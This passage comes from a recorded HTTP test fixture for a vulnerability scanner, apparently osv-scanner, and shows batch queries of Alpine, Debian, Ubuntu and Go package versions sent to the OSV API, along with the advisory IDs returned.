"Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 23023 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Debian", "name": "adduser" }, "version": "3.115" }, { "package": { "ecosystem": "Debian", "name": "apt" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "base-files" }, "version": "9.9+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "base-passwd" }, "version": "3.5.43" }, { "package": { "ecosystem": "Debian", "name": "bash" }, "version": "4.4-5" }, { "package": { "ecosystem": "Debian", "name": "bsdutils" }, "version": "1:2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "coreutils" }, "version": "8.26-3" }, { "package": { "ecosystem": "Debian", "name": "dash" }, "version": "0.5.8-2.4" }, { "package": { "ecosystem": "Debian", "name": "debconf" }, "version": "1.5.61" }, { "package": { "ecosystem": "Debian", "name": "debian-archive-keyring" }, "version": "2017.5+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "debianutils" }, "version": "4.8.1.1" }, { "package": { "ecosystem": "Debian", "name": "diffutils" }, "version": "1:3.5-3" }, { "package": { "ecosystem": "Debian", "name": "dirmngr" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "dpkg" }, "version": "1.18.25" }, { "package": { "ecosystem": "Debian", "name": "e2fslibs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "e2fsprogs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "findutils" }, "version": "4.6.0+git+20161106-2" }, { "package": { "ecosystem": "Debian", "name": "gcc-6-base" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Go", "name": "github.com/opencontainers/runc" }, "version": "v1.0.1" }, { "package": { "ecosystem": "Go", "name": "github.com/tianon/gosu" }, "version": "(devel)" }, { "package": { "ecosystem": "Debian", "name": "gnupg" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "gnupg-agent" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/sys" }, "version": "v0.0.0-20210817142637-7d9622a276b7" }, { "package": { "ecosystem": "Debian", "name": "gpgv" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "grep" }, "version": "2.27-2" }, { "package": { "ecosystem": "Debian", "name": "gzip" }, "version": "1.6-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "hostname" }, "version": "3.18+b1" }, { "package": { "ecosystem": "Debian", "name": "init-system-helpers" }, "version": "1.48" }, { "package": { "ecosystem": "Debian", "name": "libacl1" }, "version": "2.2.52-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libapt-pkg5.0" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "libassuan0" }, "version": "2.4.3-2" }, { "package": { "ecosystem": "Debian", "name": "libattr1" }, "version": "1:2.4.47-2+b2" }, { "package": { "ecosystem": "Debian", "name": "libaudit-common" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libaudit1" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libblkid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbsd0" }, "version": "0.8.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbz2-1.0" }, "version": "1.0.6-8.1" }, { "package": { "ecosystem": "Debian", "name": "libc-bin" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc-l10n" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc6" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libcap-ng0" }, "version": "0.7.7-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libcomerr2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libdb5.3" }, "version": "5.3.28-12+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libdebconfclient0" }, "version": "0.227" }, { "package": { "ecosystem": "Debian", "name": "libedit2" }, "version": "3.1-20160903-3" }, { "package": { "ecosystem": "Debian", "name": "libfdisk1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libffi6" }, "version": "3.2.1-6" }, { "package": { "ecosystem": "Debian", "name": "libgcc1" }, "version": "1:6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgcrypt20" }, "version": "1.7.6-2+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libgdbm3" }, "version": "1.8.3-14" }, { "package": { "ecosystem": "Debian", "name": "libgmp10" }, "version": "2:6.1.2+dfsg-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgnutls30" }, "version": "3.5.8-5+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libgpg-error0" }, "version": "1.26-2" }, { "package": { "ecosystem": "Debian", "name": "libgssapi-krb5-2" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libhogweed4" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libicu57" }, "version": "57.1-6+deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libidn11" }, "version": "1.33-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libjson-perl" }, "version": "2.90-1" }, { "package": { "ecosystem": "Debian", "name": "libk5crypto3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkeyutils1" }, "version": "1.5.9-9" }, { "package": { "ecosystem": "Debian", "name": "libkrb5-3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkrb5support0" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libksba8" }, "version": "1.3.5-2" }, { "package": { "ecosystem": "Debian", "name": "libldap-2.4-2" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libldap-common" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libllvm6.0" }, "version": "1:6.0-1~bpo9+1" }, { "package": { "ecosystem": "Debian", "name": "liblz4-1" }, "version": "0.0~r131-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "liblzma5" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libmount1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libncurses5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libncursesw5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libnettle6" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libnpth0" }, "version": "1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libnss-wrapper" }, "version": "1.1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libp11-kit0" }, "version": "0.23.3-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules-bin" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-runtime" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam0g" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpcre3" }, "version": "2:8.39-3" }, { "package": { "ecosystem": "Debian", "name": "libperl5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "libpq5" }, "version": "14.2-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "libreadline7" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-2" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-modules-db" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libselinux1" }, "version": "2.6-3+b3" }, { "package": { "ecosystem": "Debian", "name": "libsemanage-common" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsemanage1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsepol1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsmartcols1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsqlite3-0" }, "version": "3.16.2-5+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libss2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libssl1.1" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libstdc++6" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsystemd0" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libtasn1-6" }, "version": "4.10-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libtinfo5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libudev1" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libustr-1.0-1" }, "version": "1.0.4-6" }, { "package": { "ecosystem": "Debian", "name": "libuuid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libxml2" }, "version": "2.9.4+dfsg1-2.2+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libxslt1.1" }, "version": "1.1.29-2.1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libzstd1" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "locales" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "login" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "lsb-base" }, "version": "9.20161125" }, { "package": { "ecosystem": "Debian", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian", "name": "mount" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "multiarch-support" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "ncurses-base" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "ncurses-bin" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "netbase" }, "version": "5.4" }, { "package": { "ecosystem": "Debian", "name": "openssl" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "passwd" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "perl" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-base" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-modules-5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "pgdg-keyring" }, "version": "2018.2" }, { "package": { "ecosystem": "Debian", "name": "pinentry-curses" }, "version": "1.0.0-2" }, { "package": { "ecosystem": "Debian", "name": "postgresql-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "readline-common" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "sed" }, "version": "4.4-1" }, { "package": { "ecosystem": "Debian", "name": "sensible-utils" }, "version": "0.0.9+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "ssl-cert" }, "version": "1.0.39" }, { "package": { "ecosystem": "Debian", "name": "sysvinit-utils" }, "version": "2.88dsf-59.9" }, { "package": { "ecosystem": "Debian", "name": "tar" }, "version": "1.29b-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "tzdata" }, "version": "2021a-0+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "ucf" }, "version": "3.0036" }, { "package": { "ecosystem": "Debian", "name": "util-linux" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "xz-utils" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zlib1g" }, "version": "1:1.2.8.dfsg-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zstd" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file#01 url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22298 body: | { "results": [ { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-3374", "modified": "2026-03-17T02:42:42.368242Z" }, { "id": "DEBIAN-CVE-2018-0501", "modified": "2025-11-19T02:04:24.786271Z" }, { "id": "DEBIAN-CVE-2019-3462", "modified": "2025-11-19T02:02:50.288367Z" }, { "id": "DEBIAN-CVE-2020-27350", "modified": "2025-11-19T01:06:21.507844Z" }, { "id": "DEBIAN-CVE-2020-3810", "modified": "2025-11-19T01:08:53.168851Z" }, { "id": "DSA-4685-1", "modified": "2026-03-09T02:09:03.263738Z" }, { "id": "DSA-4808-1", "modified": "2026-03-09T02:11:17.119108Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-18276", "modified": "2025-11-19T01:19:06.470662Z" }, { "id": "DEBIAN-CVE-2022-3715", "modified": "2026-03-17T02:47:45.184492Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-2781", "modified": "2026-03-17T02:44:35.752995Z" }, { "id": "DEBIAN-CVE-2017-18018", "modified": "2026-03-17T02:45:06.555217Z" }, { "id": "DEBIAN-CVE-2024-0684", "modified": "2025-11-19T01:02:00.374806Z" }, { "id": "DEBIAN-CVE-2025-5278", "modified": "2026-03-17T02:52:23.723753Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1664", "modified": "2025-11-20T10:15:48.083782Z" }, { "id": "DEBIAN-CVE-2025-6297", "modified": "2026-03-17T02:50:41.230667Z" }, { "id": "DEBIAN-CVE-2026-2219", "modified": "2026-03-14T15:06:12.109941Z" }, { "id": "DLA-3022-1", "modified": "2026-03-09T01:23:37.553205Z" }, { "id": "DSA-5147-1", "modified": "2026-03-09T02:10:11.335992Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-5094", "modified": "2025-11-19T02:02:52.019166Z" }, { "id": "DEBIAN-CVE-2019-5188", "modified": "2025-11-19T01:01:51.904490Z" }, { "id": "DEBIAN-CVE-2022-1304", "modified": "2025-11-20T10:15:47.847878Z" }, { "id": "DLA-3910-1", "modified": "2026-03-09T01:22:32.343795Z" }, { "id": "DSA-4535-1", "modified": "2026-03-09T02:10:12.902574Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9493-h29p-rfm2", "modified": "2026-02-04T03:47:55.536228Z" }, { "id": "GHSA-cgrx-mc8f-2prm", "modified": "2026-02-04T02:50:45.342760Z" }, { "id": "GHSA-f3fp-gc8g-vw66", "modified": "2026-02-04T04:15:59.735117Z" }, { "id": "GHSA-g2j6-57v7-gm8c", "modified": "2026-02-04T02:43:58.212471Z" }, { "id": "GHSA-jfvp-7x6p-h2pv", "modified": "2026-02-04T03:12:37.981869Z" }, { "id": "GHSA-m8cg-xc2p-r3fc", "modified": "2026-02-04T03:29:19.767788Z" }, { "id": "GHSA-qw9x-cqr3-wc7r", "modified": "2026-02-04T02:13:22.313241Z" }, { "id": "GHSA-v95c-p5hm-xq8f", "modified": "2026-03-13T22:16:11.684125Z" }, { "id": "GHSA-vpvm-3wq2-2wvm", "modified": "2026-02-04T02:53:37.613379Z" }, { "id": "GHSA-xr7r-f8xq-vfvv", "modified": "2026-02-04T03:18:48.377509Z" }, { "id": "GO-2022-0274", "modified": "2026-02-04T02:26:28.343240Z" }, { "id": "GO-2022-0452", "modified": "2026-02-04T03:17:02.340230Z" }, { "id": "GO-2023-1627", "modified": "2026-02-04T03:58:42.107712Z" }, { "id": "GO-2023-1682", "modified": "2026-02-04T02:59:23.815900Z" }, { "id": "GO-2023-1683", "modified": "2026-02-04T04:01:58.343687Z" }, { "id": "GO-2024-2491", "modified": "2026-02-04T02:39:00.262696Z" }, { "id": "GO-2024-3110", "modified": "2026-02-04T02:23:26.560077Z" }, { "id": "GO-2025-4096", "modified": "2026-02-04T03:11:33.546218Z" }, { "id": "GO-2025-4097", "modified": "2026-02-04T03:00:55.376695Z" }, { "id": "GO-2025-4098", "modified": "2026-02-04T02:52:46.004719Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-p782-xgp4-8hr8", "modified": "2026-02-04T04:15:14.486111Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DSA-5122-1", "modified": "2026-03-09T02:09:10.163691Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-0379", "modified": "2025-11-19T01:06:25.120079Z" }, { "id": "DEBIAN-CVE-2017-7526", "modified": "2025-11-19T02:04:40.318681Z" }, { "id": "DEBIAN-CVE-2018-0495", "modified": "2025-11-19T02:04:27.207183Z" }, { "id": "DEBIAN-CVE-2018-6829", "modified": "2026-03-10T05:05:47.263837Z" }, { "id": "DEBIAN-CVE-2019-13627", "modified": "2025-11-19T01:12:35.581705Z" }, { "id": "DEBIAN-CVE-2021-33560", "modified": "2026-03-10T05:07:08.938163Z" }, { "id": "DEBIAN-CVE-2021-40528", "modified": "2025-11-19T01:01:59.995618Z" }, { "id": "DEBIAN-CVE-2024-2236", "modified": "2026-03-10T05:09:58.705229Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-10790", "modified": "2025-11-19T01:01:57.855157Z" }, { "id": "DEBIAN-CVE-2018-1000654", "modified": "2025-11-19T02:02:40.642360Z" }, { "id": "DEBIAN-CVE-2018-6003", "modified": "2025-11-19T01:06:22.990063Z" }, { "id": "DEBIAN-CVE-2021-46848", "modified": "2025-11-20T10:15:14.681077Z" }, { "id": "DEBIAN-CVE-2024-12133", "modified": "2025-11-20T10:17:02.620233Z" }, { "id": "DEBIAN-CVE-2025-13151", "modified": "2026-01-20T05:13:20.502324Z" }, { "id": "DLA-3263-1", "modified": "2026-03-09T01:22:34.273046Z" }, { "id": "DLA-4061-1", "modified": "2026-03-09T01:20:16.124977Z" }, { "id": "DSA-5863-1", "modified": "2026-03-09T02:08:50.747280Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-3709", "modified": "2025-11-20T10:12:11.931996Z" }, { "id": "DEBIAN-CVE-2016-9318", "modified": "2025-11-19T02:02:45.582059Z" }, { "id": "DEBIAN-CVE-2017-0663", "modified": "2025-11-19T02:02:52.056836Z" }, { "id": "DEBIAN-CVE-2017-15412", "modified": "2025-11-19T01:08:49.499099Z" }, { "id": "DEBIAN-CVE-2017-16931", "modified": "2025-11-19T02:04:25.542166Z" }, { "id": "DEBIAN-CVE-2017-16932", "modified": "2025-11-19T01:04:39.458229Z" }, { "id": "DEBIAN-CVE-2017-18258", "modified": "2025-11-19T01:08:48.927062Z" }, { "id": "DEBIAN-CVE-2017-5130", "modified": "2025-11-19T01:03:12.822124Z" }, { "id": "DEBIAN-CVE-2017-5969", "modified": "2025-11-19T01:08:52.062516Z" }, { "id": "DEBIAN-CVE-2017-7375", "modified": "2025-11-19T02:02:48.011785Z" }, { "id": "DEBIAN-CVE-2017-7376", "modified": "2025-11-19T02:01:17.016443Z" }, { "id": "DEBIAN-CVE-2017-8872", "modified": "2025-11-19T02:04:31.920669Z" }, { "id": "DEBIAN-CVE-2017-9047", "modified": "2025-11-19T02:04:30.335407Z" }, { "id": "DEBIAN-CVE-2017-9048", "modified": "2025-11-19T01:19:09.303210Z" }, { "id": "DEBIAN-CVE-2017-9049", "modified": "2025-11-19T01:03:12.259406Z" }, { "id": "DEBIAN-CVE-2017-9050", "modified": "2025-11-19T01:08:53.069573Z" }, { "id": "DEBIAN-CVE-2018-14404", "modified": "2025-11-19T01:12:32.274520Z" }, { "id": "DEBIAN-CVE-2018-14567", "modified": "2025-11-19T01:08:49.660035Z" }, { "id": "DEBIAN-CVE-2019-19956", "modified": "2025-11-19T02:01:17.970372Z" }, { "id": "DEBIAN-CVE-2019-20388", "modified": "2025-11-19T02:04:37.363509Z" }, { "id": "DEBIAN-CVE-2020-24977", "modified": "2025-11-19T02:04:41.266003Z" }, { "id": "DEBIAN-CVE-2020-7595", "modified": "2025-11-19T02:04:29.271836Z" }, { "id": "DEBIAN-CVE-2021-3516", "modified": "2025-11-19T02:01:14.946107Z" }, { "id": "DEBIAN-CVE-2021-3517", "modified": "2025-11-19T01:12:34.981900Z" }, { "id": "DEBIAN-CVE-2021-3518", "modified": "2025-11-19T01:19:08.645337Z" }, { "id": "DEBIAN-CVE-2021-3537", "modified": "2025-11-19T02:04:30.248276Z" }, { "id": "DEBIAN-CVE-2021-3541", "modified": "2025-11-19T02:04:36.614917Z" }, { "id": "DEBIAN-CVE-2022-2309", "modified": "2025-11-20T10:15:28.694644Z" }, { "id": "DEBIAN-CVE-2022-23308", "modified": "2025-11-20T10:15:29.029152Z" }, { "id": "DEBIAN-CVE-2022-29824", "modified": "2025-11-20T10:15:52.814213Z" }, { "id": "DEBIAN-CVE-2022-40303", "modified": "2025-11-20T10:16:01.982632Z" }, { "id": "DEBIAN-CVE-2022-40304", "modified": "2025-11-20T10:16:01.918054Z" }, { "id": "DEBIAN-CVE-2022-49043", "modified": "2025-11-20T10:16:12.358770Z" }, { "id": "DEBIAN-CVE-2023-28484", "modified": "2025-11-20T10:16:35.199991Z" }, { "id": "DEBIAN-CVE-2023-29469", "modified": "2025-11-20T10:17:34.943682Z" }, { "id": "DEBIAN-CVE-2023-39615", "modified": "2025-11-20T10:16:41.593841Z" }, { "id": "DEBIAN-CVE-2023-45322", "modified": "2025-11-20T10:16:44.891362Z" }, { "id": "DEBIAN-CVE-2024-25062", "modified": "2025-11-20T10:17:04.986212Z" }, { "id": "DEBIAN-CVE-2024-34459", "modified": "2025-11-20T10:17:41.570595Z" }, { "id": "DEBIAN-CVE-2024-56171", "modified": "2025-11-20T10:17:48.605695Z" }, { "id": "DEBIAN-CVE-2025-24928", "modified": "2025-11-20T10:18:05.778161Z" }, { "id": "DEBIAN-CVE-2025-27113", "modified": "2025-11-20T10:18:06.358243Z" }, { "id": "DEBIAN-CVE-2025-32414", "modified": "2025-11-20T10:18:08.076077Z" }, { "id": "DEBIAN-CVE-2025-32415", "modified": "2025-11-20T10:18:08.251077Z" }, { "id": "DEBIAN-CVE-2025-49794", "modified": "2025-11-20T10:18:23.322205Z" }, { "id": "DEBIAN-CVE-2025-49796", "modified": "2025-11-20T10:18:23.585429Z" }, { "id": "DEBIAN-CVE-2025-6021", "modified": "2025-11-20T10:18:26.314947Z" }, { "id": 